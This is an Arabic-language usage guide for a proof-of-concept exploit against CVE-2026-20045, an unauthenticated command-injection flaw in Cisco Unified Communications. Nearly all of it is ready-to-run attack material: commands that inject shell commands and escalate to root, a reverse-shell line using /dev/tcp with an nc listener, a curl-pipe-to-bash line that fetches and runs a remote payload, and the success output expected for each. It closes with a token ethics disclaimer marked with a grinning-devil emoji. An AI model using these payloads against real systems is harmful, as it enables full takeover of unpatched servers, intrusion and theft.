
إثبات مفهوم لاستغلال CVE-2026-20045، وهو ثغرة حرجة في تنفيذ الأوامر عن بُعد دون مصادقة في منتجات Cisco Unified Communications، مما يتيح حقن الأوامر وفتح قشرة عكسية مع تصعيد الصلاحيات إلى الجذر.

ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على العديد من منتجات Cisco Unified Communications. تم استغلالها بنشاط في البيئات الحقيقية قبل إصدار التصحيحات.
هذا يعني أن المهاجم يمكنه السيطرة الكاملة على الأنظمة المتأثرة عن بُعد.
إليك دليلًا منسقًا مع أمثلة استخدام لتشغيل سكربت PoC، بما في ذلك ما ستراه بالضبط في الطرفية إذا نجح الاستغلال على هدف Cisco Unified Communications ضعيف (واجهة ويب غير مصححة ومكشوفة). أضفت بعض اللمسات الجمالية باستخدام الرموز التعبيرية، وكتل أكواد ملونة (عبر markdown)، وأقسام منظمة لتحسين readability. 😎
هذا يشغّل أوامر بسيطة لجلب معرف المستخدم، واسم المستخدم، وتفاصيل النظام.
الأمر:
python3 CVE-2026-20045.py https://target-ucm:8443 "id && whoami && uname -a"
ما ستراه إذا نجح (الإخراج الناجح):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGlkICYmIHdob2FtaSAmJiB1bmFtZSAtYSAj
[*] Initial command: id && whoami && uname -a
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgaWQgJiYgd2hvYW1pICYmIHVuYW1lIC1h
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Possible command output:
------------------------------------------------------------
uid=0(root) gid=0(root) groups=0(root)
root
Linux ucm-server 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:44:33 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
------------------------------------------------------------
🔑 علامات رئيسية: مؤشرات [+] الخضراء، حالة HTTP 200، ونتائج الأوامر في كتلة الإخراج. إذا لم يظهر إخراج لكن الحالة 200، فلا يزال يعمل بصمت!
هذا يفتح قشرة تفاعلية تعود إلى جهازك. أولاً، ابدأ مستمعًا: nc -lvnp 4444.
الأمر:
python3 CVE-2026-20045.py https://target-ucm:8443 "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"
ما ستراه إذا نجح (في طرفية السكربت):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGJhc2ggLWkgPiYgL2Rldi90Y3AvWU9VUl9JUC80NDQ0IDAmPjEgIw==
[*] Initial command: bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgYmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
ما ستراه في طرفية المستمع (nc):
listening on [any] 4444 ...
connect to [YOUR_IP] from (UNKNOWN) [TARGET_IP] 54321
bash: cannot set terminal process group (1234): Inappropriate ioctl for device
bash: no job control in this shell
root@ucm-server:~# id
uid=0(root) gid=0(root) groups=0(root)
root@ucm-server:~#
🚀 علامات رئيسية: السكربت يعرض رسائل نجاح؛ المستمع يحصل فورًا على موجه قشرة جذر. اكتب الأوامر هناك للتفاعل!
هذا ينزّل ويشغّل سكربتًا من خادمك.
الأمر:
python3 CVE-2026-20045.py https://target-ucm:8443 "curl -s http://YOUR_SERVER/payload.sh | bash"
ما ستراه إذا نجح (الإخراج الناجح):
[*] Sending Stage 1 injection to: https://target-ucm:8443/cucm-uds/?query=JyA7IGN1cmwgLXMgaHR0cDovL1lPVVJfU0VSVkVSL3BheWxvYWQuc2ggfCBiYXNoICM=
[*] Initial command: curl -s http://YOUR_SERVER/payload.sh | bash
[+] Stage 1 likely succeeded! Status: 200
[*] Sending Stage 2 escalation to: https://target-ucm:8443/cucm-uds/?escalate=c3VkbyAtaTsgY3VybCAtcyBodHRwOi8vWU9VUl9TRVJWRVIvcGF5bG9hZC5zaCB8IGJhc2g=
[+] Stage 2 (root escalation) likely succeeded! Status: 200
[+] Command executed silently (check target for effects)
📥 علامات رئيسية: رموز حالة 200؛ تحقق على الهدف (مثل: فحص السجلات/الملفات) أو على خادمك (سجلات التنزيل). لا يوجد إخراج مباشر إذا كانت الحمولة صامتة.
💡 نصائح احترافية:
sudo إذا لزم الأمر لصلاحيات الشبكة.تحقق غير صحيح من المدخلات المقدمة من المستخدم في واجهات إدارة HTTP، مما يسمح بـ حقن الأوامر الذي يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.
جميع أكواد PoC مخصصة للاستخدام الأخلاقي والتعليمي فقط على الأنظمة المصرح بها. الاستغلال غير المصرح به غير قانوني؛ لا نتحمل أي مسؤولية عن سوء الاستخدام. 😈